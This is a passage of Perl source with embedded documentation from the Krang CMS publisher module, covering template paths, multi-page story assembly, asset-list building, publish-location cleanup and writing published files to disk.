my $user_id = $ENV{REMOTE_USER};
# Root dir for this instance.
my $root = catdir(KrangRoot, 'data', 'templates', pkg('Conf')->instance());
if (exists($args{category})) {
if (!defined($args{category})) {
# if category arg is not defined, return root dir for instance.
# (but check for template testing)
if ($self->{is_preview}
&& exists($self->{testing_template_path}{$user_id}))
{
return ($self->{testing_template_path}{$user_id}, $root);
}
return $root;
}
$category = $args{category};
} else {
$category = $self->{category};
}
croak __PACKAGE__ . ': missing argument \'category\'' unless (defined($category));
@subdirs = split '/', $category->url();
while (@subdirs > 0) {
# if in preview mode, check to see if there's a template testing dir.
# add it if there is.
if ($self->{is_preview}
&& exists($self->{testing_template_path}{$user_id}))
{
push @paths, catfile($self->{testing_template_path}{$user_id}, @subdirs);
}
push @paths, catfile($root, @subdirs);
pop @subdirs;
}
# add root (possibly preview too) dir as well.
if ($self->{is_preview}
&& exists($self->{testing_template_path}{$user_id}))
{
push @paths, $self->{testing_template_path}{$user_id};
}
push @paths, $root;
return @paths;
}
=item C<< $txt = $publisher->page_break() >>
Returns the tag used internally to mark the break between pages in a
story. When a multi-page story is assembled by the
Krang::ElementClass element tree, it consists of a scalar containing
these break tags. The preview/publish process will split the scalar
along those tags to create the individual pages of the story.
No exceptions to throw.
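A minimal sketch of how the tag can be used to split assembled output
(variable names are illustrative only):

  my $break = $publisher->page_break();
  my @pages = split /\Q$break\E/, $story_output;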
=cut
sub page_break {
return PAGE_BREAK;
}
=item C<< $txt = $publisher->content() >>
Returns the tag used internally to mark the break between the top and
bottom sections of a category page. Once broken, the individual pages
of a story will be placed in between the two halves, and the full HTML
page will be assembled.
No exceptions to throw.
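A minimal sketch of how the tag can be used to split category output into
its header and footer halves (variable names are illustrative only):

  my $tag = $publisher->content();
  my ($top, $bottom) = split /\Q$tag\E/, $category_output, 2;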
=cut
sub content {
return CONTENT;
}
=item C<< $publisher->additional_content_block(filename => $filename, content => $html, use_category => 1); >>
C<additional_content_block> creates an entry in the publisher that
will be re-visited once the entire story content has been constructed.
During the final output of the story, the content C<$html> will be
written out separately to C<$filename>.
C<content> and C<filename> arguments are required.
C<use_category> is a boolean flag that tells Krang::Publisher whether
or not to add the current L<Krang::Category> header/footer to the
final output, as it will for the regular published output. Defaults
to true.
C<category_tmpl_args> is an optional hashref of keys/values to add
to the $fill_template_args hashref passed to category's fill_template()
method (which by default includes a single key/value pair, additional_content =>
$filename). This of course has no effect if use_category is set to 0.
C<mode> is an optional parameter which will set the permissions
of the file which is published. The mode should be specified in
octal (NOT a string). If not specified, the mode of the published
file will be based on the umask.
An optional C<post_process> code ref may be supplied that will receive
the created content as a scalarref after the optional category template
has been applied.
If you want to write binary data (e.g. images), you B<must> specify
the 'binary' argument.
B<WARNING:> C<additional_content_block()> can be called as many times
as desired, however it does not perform any sanity checks on
C<filename> - if your output contains multiple blocks of additional
content with identical filenames, they will overwrite each other, and
only the last one will remain.
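A minimal usage sketch (the filename and content shown are illustrative
only):

  $publisher->additional_content_block(
      filename     => 'sitemap.xml',
      content      => $xml,
      use_category => 0,
      binary       => 0,
  );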
=cut
sub additional_content_block {
my $self = shift;
my %args = @_;
my %block;
$block{content} = $args{content};
$block{filename} = $args{filename};
$block{binary} = $args{binary};
croak __PACKAGE__ . ": missing required argument 'content'" unless defined $block{content};
croak __PACKAGE__ . ": missing required argument 'filename'" unless length $block{filename};
$block{use_category} = exists($args{use_category}) ? $args{use_category} : 1;
$block{mode} = exists($args{mode}) ? $args{mode} : undef;
croak __PACKAGE__ . ": post_process is not a code block"
if $args{post_process} && ref $args{post_process} ne 'CODE';
$block{post_process} = $args{post_process};
$block{category_tmpl_args} = $args{category_tmpl_args};
push @{$self->{additional_content}}, \%block;
}
=item C<< %vars = $publisher->publish_context(%set_params) >>
C<publish_context()> provides a way to set and retrieve parameters in
the L<Krang::Publisher> object during the publish process for a single
story.
C<publish_context()> takes a hash of parameters for storage, and will
return a hash of all stored parameters if called without arguments.
Note that setting the same key multiple times will result in
only the last value being stored.
# store 'foo => bar'
$publisher->publish_context(foo => 'bar');
# $vars{foo} is 'bar'
my %vars = $publisher->publish_context();
# foo is now 'baz'
$publisher->publish_context(foo => 'baz');
Note - the internal hash used by C<publish_context()> is cleared after
every story is published - the variables stored here are not
persistent across stories.
=cut
sub publish_context {
my $self = shift;
$self->{publish_context} ||= {};
# check to see if there are params.
if (@_) {
my %args = @_;
foreach my $key (keys %args) {
$self->{publish_context}{$key} = $args{$key};
}
return;
}
return $self->{publish_context}
? %{$self->{publish_context}}
: ();
}
=item C<< $publisher->clear_publish_context() >>
Working in conjunction with C<publish_context()> above, clear the
internal hash.
Nothing is returned.
=cut
sub clear_publish_context {
my $self = shift;
delete $self->{publish_context};
$self->{publish_context} = {};
}
=item C<< $filename = $publisher->story_filename(page => $page_num); >>
Returns the filename (B<NOT> the path + filename, just the filename)
of the current story being published, given the page number.
Arguments:
=over
=item * C<page>
The page number of the story. Defaults to 0.
=item * C<story>
Optional. Defaults to L<story()>. Use it if you want a filename for
something other than what is currently being published.
=back
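A minimal usage sketch (assumes a publish run is in progress, so story()
is set):

  my $filename = $publisher->story_filename(page => 0);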
=cut
sub story_filename {
my ($self, %args) = @_;
my $page = $args{page} || '';
my $story = $args{story} || $self->story;
my $element = $story->element();
return $element->class()->filename(story => $story) . $page
. $element->class()->extension(story => $story);
}
=item C<< $bool = $publisher->test_publish_status(object => $story, mode => 'publish') >>
Checks the current version of the object against its stored
C<preview_version> or C<published_version>. If the versions are not
identical, it will return true, indicating that it should be
published.
If the versions are identical, it will perform an additional check for
L<Krang::Story> objects, checking
L<Krang::ElementClass::TopLevel>->C<force_republish>.
Will return 0 (false) if it determines that there is no rule
indicating the asset should be published.
Arguments:
=over
=item * C<object>
The L<Krang::Story> or L<Krang::Media> object to be published.
=item * C<mode>
Either 'preview' or 'publish'. If this is not set, it will check
L<is_preview()> and L<is_publish()> for an indication of mode. If
those are not set either, it will croak with an error.
=back
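A minimal usage sketch (hypothetical; C<$story> is assumed to be a saved
L<Krang::Story>):

  if ($publisher->test_publish_status(object => $story, mode => 'publish')) {
      # the published copy is out of date, so republish it
  }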
=cut
sub test_publish_status {
my ($self, %args) = @_;
my $object = $args{object} || croak "Missing required argument 'object'";
my $mode = $args{mode};
my $publish_yes = 0;
if ($mode) {
if ($mode eq 'preview') { $self->_set_preview_mode(); }
elsif ($mode eq 'publish') { $self->_set_publish_mode(); }
else { croak __PACKAGE__ . ": unknown output mode '$mode'\n"; }
} else {
if ($self->is_preview()) { $mode = 'preview'; }
elsif ($self->is_publish()) { $mode = 'publish'; }
else {
croak "Publish mode unknown. Set the 'mode' argument'";
}
}
# check versioning.
if ($mode eq 'preview') {
$publish_yes = 1 unless ($object->preview_version == $object->version);
} else {
$publish_yes = 1 unless ($object->published_version == $object->version);
}
return $publish_yes if $publish_yes;
# otherwise, check on the filesystem for missing files.
$publish_yes = $self->_check_object_missing(object => $object);
return $publish_yes if $publish_yes;
# for stories, can check force_republish.
if ($object->isa('Krang::Story')) {
$publish_yes = $object->element->class->force_republish();
}
return $publish_yes;
}
=item C<< $url = $publisher->url_for(object => $story) >>
=item C<< $url = $publisher->url_for(object => $media) >>
=item C<< $url = $publisher->url_for(object => $category) >>
=item C<< $url = $publisher->url_for(object => $site) >>
=item C<< $url = $publisher->url_for(object => $object) >>
Returns the object's URL according to the publishing context.
Object may be a L<Krang::Story>, L<Krang::Media>,
L<Krang::Category>, L<Krang::Site> or any other object having both methods
url() and preview_url().
Returns the empty string if $object is not a reference.
Croaks if $object does not have both methods url() and preview_url().
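A minimal usage sketch (hypothetical; C<$story> is any object providing
url() and preview_url()):

  my $link = $publisher->url_for(object => $story);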
=cut
sub url_for {
my ($self, %arg) = @_;
my $object = $arg{object};
return '' unless ref($object);
# duck typing object check
for my $method (qw(url preview_url)) {
unless ($object->can($method)) {
croak(__PACKAGE__ . ': ' . ref($object) . " misses required method '$method'.");
}
}
# build URL
if ($self->is_publish) {
return 'http://' . $object->url;
} elsif ($self->is_preview) {
my $scheme = PreviewSSL ? 'https' : 'http';
return "$scheme://" . $object->preview_url();
} else {
croak(__PACKAGE__ . ': Not in publish nor preview mode. Cannot return proper URL.');
}
}
=back
=head1 TODO
Nothing at the moment.
=head1 SEE ALSO
L<Krang::ElementClass>, L<Krang::Category>, L<Krang::Media>
=cut
# $self->_rectify_publish_locations(object => $object, paths=>[], preview => 1)
#
# remove any dangling files previously published for this object and
# update the publish location data in the DB
sub _rectify_publish_locations {
my $self = shift;
my %arg = @_;
my $object = $arg{object};
my $paths = $arg{paths} || [];
my $preview = $arg{preview};
my $type = $object->isa('Krang::Story') ? 'story' : 'media';
my $id = $type eq 'story' ? $object->story_id : $object->media_id;
my $dbh = dbh;
# get old location list
my $old_paths = $dbh->selectcol_arrayref(
"SELECT path FROM publish_${type}_location
WHERE ${type}_id = ? AND preview = ?", undef, $id, $preview
);
# build hash of current paths
my %cur = map { ($_, 1) } @$paths;
# delete any files that aren't part of the current set
foreach my $old (@$old_paths) {
next if $cur{$old};
next unless -f $old;
# make sure this path isn't claimed by another object
my ($claimed) = $dbh->selectrow_array(
"SELECT 1 FROM publish_${type}_location "
. "WHERE path = ? AND preview = ? "
. "AND ${type}_id != ?",
undef, $old, $preview, $id
);
next if $claimed;
unlink($old)
or croak("Unable to delete extinct publish result '$old'.");
}
# write new paths to publish location table if we have an id (it
# was saved)
if ($id) {
$dbh->do(
"DELETE FROM publish_${type}_location
WHERE ${type}_id = ? AND preview = ?", undef, $id, $preview
);
$dbh->do(
"INSERT INTO publish_${type}_location
(${type}_id,preview,path) VALUES " . join(',', ('(?,?,?)') x @$paths),
undef, map { ($id, $preview, $_) } @$paths
) if @$paths;
}
}
#
# _is_path_claim_stale
#
#
# Used solely in unpublish_story to see if claims in the publish_story_location table
# reflect the current path of the saved story.
# If the slug of a story is changed and the story is not published or previewed, there can
# be conflicts which used to prevent the files and the table entry from being removed.
#
sub _is_path_claim_stale {
my $self = shift;
my %args = @_;
my $type = $args{type};
my $claimed_id = $args{claimed_id};
my $claimed_path = $args{claimed_path};
if ($type eq 'story') {
my ($claimed_story) = pkg('Story')->find(story_id => $claimed_id);
if ($claimed_story) {
foreach my $current_path ($claimed_story->publish_path, $claimed_story->preview_path) {
$current_path .= '/index.html';
return if $current_path eq $claimed_path;
}
}
}
return 1;
}
#
# _deploy_testing_templates()
#
#
# Used solely in preview, searches for any templates checked out by the
# current user that are flagged as 'testing'. If it finds any,
# deploys them in a temporary directory path. The rest of the preview
# process will pick up these templates on an as-needed basis.
# (see template_search_path()).
#
# Takes no arguments. Requires that $ENV{REMOTE_USER} exists.
#
sub _deploy_testing_templates {
my $self = shift;
my $path;
my $user_id = $ENV{REMOTE_USER}
|| croak __PACKAGE__ . ": 'REMOTE_USER' environment variable is not set!\n";
# update our counter so that we can pair with _undeploy_testing_templates()
$self->{_undeploy_testing_templates_counter}++;
# find any templates checked out by this user that are marked for testing.
my @templates = pkg('Template')->find(testing => 1, checked_out_by => $user_id);
# if there are no templates, there's nothing left to do here.
return unless (@templates);
# there are templates - create a tempdir & deploy these bad boys.
$path = tempdir(DIR => catdir(KrangRoot, 'tmp'));
$self->{testing_template_path}{$user_id} = $path;
foreach (@templates) {
$self->_write_template(template => $_);
}
}
#
# _undeploy_testing_templates()
#
# Removes the template files & temporary directory used by the current
# user for previewing the templates they have flagged for testing.
# This is a cleanup method, nothing more.
#
# Will croak if there's a system error or it cannot determine the user.
#
# Must be used in pairs with _deploy_testing_templates(). So if you call
# _deploy_testing_templates twice, you must call _undeploy_testing_templates()
# twice in order to un-deploy the test templates
sub _undeploy_testing_templates {
my $self = shift;
my $user_id = $ENV{REMOTE_USER}
|| croak __PACKAGE__ . ": 'REMOTE_USER' environment variable is not set!\n";
# decrement our counter if we have one so we know we were used in a pair
$self->{_undeploy_testing_templates_counter}-- if $self->{_undeploy_testing_templates_counter};
# if we still aren't ready to clean up then just return
return if $self->{_undeploy_testing_templates_counter};
# there's no work if there's no dir.
return unless exists($self->{testing_template_path}{$user_id});
eval { rmtree($self->{testing_template_path}{$user_id}); };
if ($@) {
croak __PACKAGE__
. ": error removing temporary dir '$self->{testing_template_path}{$user_id}': $@";
}
delete $self->{testing_template_path}{$user_id};
return;
}
#
# @paths = _build_story_all_categories(story => $story);
#
# Handles the process for publishing a story out over all its various categories.
#
# Returns a list of file-system paths where the story was written
#
sub _build_story_all_categories {
my $self = shift;
my %args = @_;
my $story = $args{story};
my @categories = $story->categories();
# Categories & Story URLs are in identical order. Move in lockstep w/ both of them.
my @paths;
foreach (my $i = 0 ; $i <= $#categories ; $i++) {
push @paths,
$self->_build_story_single_category(
story => $story,
category => $categories[$i],
);
}
# log history
if ($self->{is_publish}) {
my %history_args = $args{history_args} ? %{$args{history_args}} : ();
add_history(object => $story, action => 'publish', %history_args);
}
return @paths;
}
#
# @paths = _build_story_single_category(story => $story, category => $category);
#
# Used by both preview & publish processes.
#
# Takes a Krang::Story and Krang::Category object. Builds the story
# pages (and additional content, if it exists) for the story, and
# writes output to disk.
#
# Returns a list of files written to the filesystem (w/ complete path).
#
sub _build_story_single_category {
my $self = shift;
my %args = @_;
my @paths;
my @pages;
my $additional_content;
my ($cat_header, $cat_footer);
my $story = $args{story} || croak __PACKAGE__ . ": missing argument 'story'";
my $category = $args{category} || croak __PACKAGE__ . ": missing argument 'category'";
my $output_path = $self->_determine_output_path(object => $story, category => $category);
# set internal values for accessor methods to call.
$self->{category} = $category;
$self->{story} = $story;
# get root element for the story & category.
my $story_element = $story->element();
my $category_element = $category->element();
# get story output
my $article_output = $story_element->publish(publisher => $self);
# maybe add preview editor overlay
my $div = EnablePreviewEditor && $self->is_preview
? pkg('ElementClass')->_get_preview_editor_element_overlays(child => $story_element, publisher => $self)
: '';
# break the story into pages
my @article_pages = map { $div . $_ } split(/${\PAGE_BREAK}/, $article_output);
# if nothing returned, we have a problem. Throw an error.
if ($#article_pages < 0) {
my $url = $self->is_preview() ? $category->preview_url : $category->url;
Krang::Publisher::ZeroSizeOutput->throw(
message => sprintf("Story %i output for %s is zero-length", $story->story_id, $url),
story_id => $story->story_id,
category_url => $url,
story_class => $story->class->name
);
}
# chuck the last page if it's only whitespace.
if ($#article_pages > 0) {
pop @article_pages if ($article_pages[$#article_pages] =~ /^\s*$/);
}
# check to see if category output is needed
if ($story_element->use_category_templates()) {
# category pages must be published once for each story page.
if ($story_element->class->publish_category_per_page()) {
my $i = 0;
foreach my $p (@article_pages) {
my %tmpl_args = (
page_index => $i,
last_page_index => $#article_pages
);
my ($head, $foot) =
$self->_cat_content($category_element, fill_template_args => \%tmpl_args);
my $output = $head . $p . $foot;
push @pages, $output;
# cat_header and cat_footer need to be set w/ first
# page tmpl for additional content needs.
unless ($i) {
$cat_header = $head;
$cat_footer = $foot;
}
$i++;
}
} else {
($cat_header, $cat_footer) = $self->_cat_content($category_element);
# assemble the components.
foreach (@article_pages) {
my $page = $cat_header . $_ . $cat_footer;
push @pages, $page;
}
}
} else {
# no category templates being used.
@pages = @article_pages;
}
# write additional content to disk
while (my $block = shift @{$self->{additional_content}}) {
my $content = $block->{content};
if ($block->{use_category}) {
my $tmpl_args = $block->{category_tmpl_args} || {};
$tmpl_args->{additional_content} = $block->{filename};
($cat_header, $cat_footer) =
$self->_cat_content($category_element, fill_template_args => $tmpl_args)
unless (($cat_header or $cat_footer)
and not $story_element->class->publish_category_per_page());
$content = $cat_header . $content . $cat_footer;
}
if ($block->{post_process}) {
$block->{post_process}->(\$content);
}
my $output_filename = $self->_write_page(
data => $content,
filename => $block->{filename},
binary => $block->{binary},
story_id => $story->story_id,
path => $output_path
);
push(@paths, $output_filename);
# set mode if available
if (my $mode = $block->{mode}) {
chmod($mode, $output_filename)
or croak("Unable to chmod($mode, $output_filename): $!");
}
}
push @paths, $self->_write_story(story => $story, pages => \@pages, path => $output_path);
return @paths;
}
# gets header and footer from category publishing
sub _cat_content {
my ($self, $category_element, %args) = @_;
my $category_output = $category_element->publish(
publisher => $self,
%args
);
return split(/${\CONTENT}/, $category_output, 2);
}
##################################################
##
## Asset Link Checking
##
#
# @assets = _build_asset_list(object => \@story, version_check => 1, initial_assets => 1);
#
# Recursively builds the list of assets to be published, called by
# asset_list().
#
# story can be either a Krang::Story or Krang::Media object, or a
# listref of Story/Media objects.
#
# version_check will check preview/published_version if true.
# Defaults true.
#
# initial_assets will skip that check when true - used for the first
# call from asset_list(). Defaults false.
#
# maintain_versions defaults to 0. If true, we will build a list of the last-published
# version of each asset (if any) rather than the latest version.
#
# Returns a list of Krang::Story and Krang::Media objects.
#
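# A sketch of a typical internal call (argument values are illustrative only):
#
#   my @assets = $self->_build_asset_list(
#       object          => \@stories,
#       implication_map => {},
#       initial_assets  => 1,
#   );
#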
sub _build_asset_list {
my ($self, %args) = @_;
my $object = $args{object};
my $implication_map = $args{implication_map};
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $initial_assets = (exists($args{initial_assets})) ? $args{initial_assets} : 0;
my $maintain_versions = (exists($args{maintain_versions})) ? $args{maintain_versions} : 0;
my @asset_list;
my @check_list;
my @objects = (ref $object eq 'ARRAY') ? @$object : ($object);
foreach my $o (@objects) {
# don't publish (linked) objects that are retired or trashed
next if $self->is_publish() && $o->can('wont_publish') && $o->wont_publish();
# handle 'maintain_versions' mode
if ($maintain_versions) {
unless ($o->checked_out && ($o->checked_out_by != $ENV{REMOTE_USER})) {
my $v = $o->published_version;
next unless $v;
if ($v != $o->version) {
if ($o->isa('Krang::Story')) {
($o) = pkg('Story')->find(story_id => $o->story_id, version => $v);
} else {
($o) = pkg('Media')->find(media_id => $o->media_id, version => $v);
}
}
}
}
my ($publish_ok, $check_links) = $self->_check_asset_status(
object => $o,
version_check => $version_check,
initial_assets => $initial_assets
);
push @asset_list, $o if ($publish_ok);
if ($check_links) {
my $check_stories = !($self->is_preview && IgnorePreviewRelatedStoryAssets);
my $check_media = !($self->is_preview && IgnorePreviewRelatedMediaAssets);
if ($check_stories) {
my @linked_stories = $o->linked_stories(publisher => $self);
$self->_update_implication_map($implication_map, $o, \@linked_stories);
push @check_list, @linked_stories;
}
if ($check_media) {
my @linked_media = $o->linked_media;
$self->_update_implication_map($implication_map, $o, \@linked_media);
push @check_list, @linked_media;
}
}
}
# if there are objects to be checked, check 'em.
push @asset_list,
$self->_build_asset_list(
object => \@check_list,
implication_map => $implication_map,
version_check => $version_check,
maintain_versions => $maintain_versions,
initial_assets => 0,
) if (@check_list);
return @asset_list;
}
sub _stringify_implication_chain {
my $self = shift;
my $implication_map = shift;
my $o = shift;
die "Error: cannot find a chain without a starting point" unless $o;
my $object_key = $self->_implication_key($o);
die sprintf 'Error: object_key [%s] not found in implication_map', ($object_key || '-undef-')
unless (defined $implication_map->{$object_key});
return if ($implication_map->{$object_key} eq 'original publish list');
return $implication_map->{$object_key};
}
sub _update_implication_map {
my $self = shift;
my $implication_map = shift;
my $o = shift;
my $linked_assets = shift;
my $object_key = $self->_implication_key($o);
foreach my $asset (@{$linked_assets}) {
my $candidate_key = $self->_implication_key($asset);
next if $implication_map->{$candidate_key};
$implication_map->{$candidate_key} = $object_key;
}
}
sub _implication_key {
my $self = shift;
my $o = shift;
if ($o->isa('Krang::Story')) {
return 'story ' . $o->story_id;
} else {
return 'media ' . $o->media_id;
}
}
#
# ($publish_ok, $check_links) = _check_object_status(object => $object,
# initial_assets => 1
# version_check => 1);
#
# checks the Krang::Story or Krang::Media object to see if it should
# be added to the publish list, and whether or not it needs to be
# checked for related assets.
#
# object - a Krang::Story or Krang::Media object
#
#
sub _check_asset_status {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $initial_assets = (exists($args{initial_assets})) ? $args{initial_assets} : 0;
my $publish_ok = 0;
my $check_links = 0;
my $instance = pkg('Conf')->instance();
if ($self->_mark_asset(object => $object)) {
if ($initial_assets || !$version_check) {
$publish_ok = 1;
} elsif ($self->test_publish_status(%args)) {
$publish_ok = 1;
}
}
if ($self->_mark_asset_links(object => $object)) {
$check_links = 1;
}
return ($publish_ok, $check_links);
}
#
# $bool = _mark_asset(object => $object)
#
# Checks to see if the object exists in the asset list.
#
# If it does not exist, the object is added to the asset list, and 1 is returned.
# If it does exist, 0 is returned.
#
sub _mark_asset {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $instance = pkg('Conf')->instance();
my $set;
my $id;
# make sure the asset list exists - non-destructive init.
$self->_init_asset_lists();
if ($object->isa('Krang::Story')) {
$set = 'story_publish_set';
$id = $object->story_id();
} elsif ($object->isa('Krang::Media')) {
$set = 'media_publish_set';
$id = $object->media_id();
} else {
# should never get here.
croak sprintf("%s->_mark_asset: unknown object type: %s\n", __PACKAGE__, $object->isa);
}
if ($self->{asset_list}{$instance}{$set}{$id}) {
return 0;
}
# not seen before.
$self->{asset_list}{$instance}{$set}{$id} = 1;
return 1;
}
#
# $bool = _mark_asset_links(object => $object)
#
# Returns 1 if the object has not been checked previously for related links.
# Returns 0 if the object has been checked before.
#
# Returns 0 if the object is not a Krang::Story object (and therefore has no related assets).
#
sub _mark_asset_links {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
return 0 unless ($object->isa('Krang::Story'));
# make sure the asset list exists - non-destructive init.
$self->_init_asset_lists();
my $instance = pkg('Conf')->instance();
my $story_id = $object->story_id();
if ($self->{asset_list}{$instance}{checked_links_set}{$story_id}) {
return 0;
}
$self->{asset_list}{$instance}{checked_links_set}{$story_id} = 1;
return 1;
}
#
# $bool = _check_object_missing(object => $object);
#
# Checks all possible filesystem locations for an object (e.g. where
# they could get published to), returns false if they all exist, true
# if any of them cannot be found on the filesystem
#
# object is a Krang::Story or Krang::Media object
#
sub _check_object_missing {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $bool = 0;
if ($object->isa('Krang::Story')) {
# check all categories
foreach my $cat ($object->categories) {
my $path = $self->_determine_output_path(object => $object, category => $cat);
my $filename = $self->story_filename(story => $object);
my $output_filename = catfile($path, $filename);
unless (-e $output_filename) {
# if any are missing, true.
$bool = 1;
last;
}
}
} else {
my $path = $self->_determine_output_path(object => $object);
$bool = 1 unless (-e $path);
}
return $bool;
}
#
# _init_asset_lists()
#
# Set up the internally-maintained lists of asset IDs,
# these lists are used by asset_list to determine which assets are
# going to get published.
#
sub _init_asset_lists {
my $self = shift;
my $instance = pkg('Conf')->instance();
foreach (qw(story_publish_set media_publish_set checked_links_set)) {
$self->{asset_list}{$instance}{$_} = {} unless (exists($self->{asset_list}{$instance}{$_}));
}
}
#
# _clear_asset_lists()
#
# Nukes all content in the asset lists.
#
sub _clear_asset_lists {
my $self = shift;
my $instance = pkg('Conf')->instance();
foreach (keys %{$self->{asset_list}{$instance}}) {
delete $self->{asset_list}{$instance}{$_};
}
delete $self->{asset_list};
}
############################################################
#
# ADDITIONAL CONTENT METHODS
#
##################################################
##
## Output
##
#
# $url = $pub->_write_media($media)
#
# Internal method for writing a media object to disk. Returns media URL if successful.
#
sub _write_media {
my $self = shift;
my %args = @_;
my $media = $args{media} || croak __PACKAGE__ . ": missing argument 'media'";
my $internal_path = $media->file_path();
my $output_path = $self->_determine_output_path(object => $media);
$output_path =~ /^(.*\/)[^\/]+/;
my $dir_path = $1;
# make sure the output dir exists
eval { mkpath($dir_path, 0, 0755); };
if ($@) {
Krang::Publisher::FileWriteError->throw(
message => "Could not create output directory: $@",
destination => $dir_path,
system_error => $@
);
}
# copy file out to the production path
unless (copy($internal_path, $output_path)) {
Krang::Publisher::FileWriteError->throw(
message => "Could not copy media file from " . $internal_path . ": $!",
media_id => $media->media_id(),
source => $internal_path,
destination => $output_path,
system_error => $!
);
}
# fix up output location
$self->_rectify_publish_locations(
object => $media,
paths => [$output_path],
preview => $self->{is_preview}
);
# if media element has a publish() method, call it
# (we do this in _write_media() since it's called by
# both publish_media() and preview_media())
if ($media->element->class->can('publish')) {
$media->element->class->publish(
publisher => $self,
media => $media,
element => $media->element
);
}
# return URL
$self->{is_preview} ? return $media->preview_url : return $media->url;
}
#
# @filenames = _write_story(story => $story_obj, path => $output_path, pages => \@story_pages);
#
# Given a Krang::Story object and a list of pages comprising the published
# version of the object, write the pages to the filesystem.
#
# Returns the list of files written out.
#
sub _write_story {
my $self = shift;
my %args = @_;
my $story = $args{story} || croak __PACKAGE__ . ": missing argument 'story'";
my $pages = $args{pages} || croak __PACKAGE__ . ": missing argument 'pages'";
my $output_path = $args{path} || croak __PACKAGE__ . ": missing argument 'path'";
my $class = $story->element->class;
my $mode_fn = $class->can('file_mode') || sub { };
my @created_files;
for (my $page_num = 0 ; $page_num < @$pages ; $page_num++) {
my $filename = $self->story_filename(story => $story, page => $page_num);
my $output_filename = $self->_write_page(
path => $output_path,
filename => $filename,
story_id => $story->story_id,
data => $pages->[$page_num]
);
# set mode if available
if (my $mode = $mode_fn->($class, $output_filename)) {
chmod($mode, $output_filename)
or croak("Unable to chmod($mode, $output_filename): $!");
}
push(@created_files, $output_filename);
}
return @created_files;
}
#
# $output_filename = _write_page(path => $path, filename => $filename, data => $content, story_id => $id);
#
# To write binary data:
#
# $output_filename = _write_page(path => $path, filename => $filename, data => $content, story_id => $id, binary => 0);
#
# Writes the content in $data to $path/$filename.
#
# Will croak if it cannot determine the filename, or
# cannot write to the filesystem.
#
# Returns the full path to the file written.
#
sub _write_page {
my $self = shift;
my %args = @_;
foreach (qw(path filename)) {
croak __PACKAGE__ . ": missing parameter '$_'.\n" unless defined($args{$_});
}
eval { mkpath($args{path}, 0, 0755); };
if ($@) {
Krang::Publisher::FileWriteError->throw(
message => "Could not create directory '$args{path}': $@",
destination => $args{path},
system_error => $@
);
}
my $output_filename = catfile($args{path}, $args{filename});
my $fh = pkg('IO')->io_file(">$output_filename", 'binary' => $args{binary})
or Krang::Publisher::FileWriteError->throw(
message => "Cannot output story to $output_filename: $!",
story_id => $args{story_id},
destination => $output_filename,
system_error => $!
);
$fh->print($args{data});
$fh->close();
debug("Publisher.pm: wrote page '$output_filename'");
return $output_filename;
}
#
# $filename = _write_template(template => $template);
#
# Given a template, determines the full path of the template and writes it to disk.
# Will croak in the event of an error in the process.
# Returns the full path + filename if successful.
#
sub _write_template {
my $self = shift;
my %args = @_;
my $template = $args{template};
my $id = $template->template_id();
my $category = $template->category();
my @tmpl_dirs = $self->template_search_path(category => $category);
my $path = $tmpl_dirs[0];
eval { mkpath($path, 0, 0755); };
if ($@) {
Krang::Publisher::FileWriteError->throw(
message => "Could not create publish directory: $@",
destination => $path,
system_error => $@
);
}
my $file = catfile($path, $template->filename());
# write out file
my $fh = pkg('IO')->io_file(">$file")
or Krang::Publisher::FileWriteError->throw(
message => "Cannot deploy template: $!",
template_id => $id,
destination => $file,
system_error => $!
);
$fh->print($template->{content});
$fh->close();
return $file;
}
#
# $path = $self->_determine_output_path(object => $object, category => $category);
#
# For Krang::Story objects, returns the directory under which the
# story will be written on the filesystem for a given category.
#
# For Krang::Media objects, returns the full path to file.
#
sub _determine_output_path {
my $self = shift;
my %args = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $output_path;
if ($self->{is_publish}) {
if ($object->isa('Krang::Story')) {
my $category = $args{category} || croak __PACKAGE__ . ": missing argument 'category'";
$output_path = $object->publish_path(category => $category);
} else {
$output_path = $object->publish_path();
}
} elsif ($self->{is_preview}) {
if ($object->isa('Krang::Story')) {
my $category = $args{category} || croak __PACKAGE__ . ": missing argument 'category'";
$output_path = $object->preview_path(category => $category);
} else {
$output_path = $object->preview_path();
}
} else {
croak __PACKAGE__ . ": Cannot determine preview/publish mode";
}
return $output_path;
}
sub _add_category_linked_stories {
my ($self, $publish_list, $implication_map) = @_;
my $user_id = $ENV{REMOTE_USER};
my %linked_stories = ();
for my $object (@$publish_list) {
next unless $object;
my $type =
$object->isa('Krang::Story') ? 'story' : $object->isa('Krang::Media') ? 'media' : undef;
next unless $type;
# don't look for candidate stories if object is checked out
if ($object->checked_out) {
if ($user_id != $object->checked_out_by) {
debug( sprintf
__PACKAGE__
. ': skipping _add_category_linked_stories on checked out %s object id=%s',
$type, (
$type eq 'story' ? $object->story_id
: $type eq 'media' ? $object->media_id
: '')
);
next;
}
}
# look for any stories that link to this category that should also be published
my $sql = qq/
SELECT story_id FROM story_category_link
WHERE category_id = ? AND publish_if_modified_${type}_in_cat = 1
/;
my $sth = dbh()->prepare_cached($sql);
for my $cat ($object->categories) {
$sth->execute($cat->category_id);
while (my $row = $sth->fetchrow_arrayref) {
# inflate story_id value into a story object, but only if it isn't already marked for publishing
my $candidate_story_id = $row->[0];
unless (exists $linked_stories{$candidate_story_id}) {
my ($candidate) = pkg('Story')->find(story_id => $candidate_story_id);
if($candidate->can('wont_publish') && $candidate->wont_publish()) {
debug( sprintf
__PACKAGE__
. ': skipping candidate %s object id=%s that wont_publish',
$type, (
$type eq 'story' ? $candidate->story_id
: $type eq 'media' ? $candidate->media_id
: '')
);
next;
}
# only keep if the class method should_category_linked_publish() says the candidate should be published
if (
$candidate->element->class->should_category_linked_publish(
publisher => $self,
candidate => $candidate,
object => $object,
)
)
{
$linked_stories{$candidate_story_id} = $candidate;
$self->_update_implication_map($implication_map, $object, [$candidate]);
}
}
}
# look for stories that are linked to our parent categories that should also be published
if (my @parent_cat_ids = $cat->ancestors(ids_only => 1)) {
my $in_clause = '(' . join(',', ('?') x @parent_cat_ids) . ')';
$sql = qq/
SELECT story_id FROM story_category_link
WHERE category_id IN $in_clause AND publish_if_modified_${type}_below_cat = 1
/;
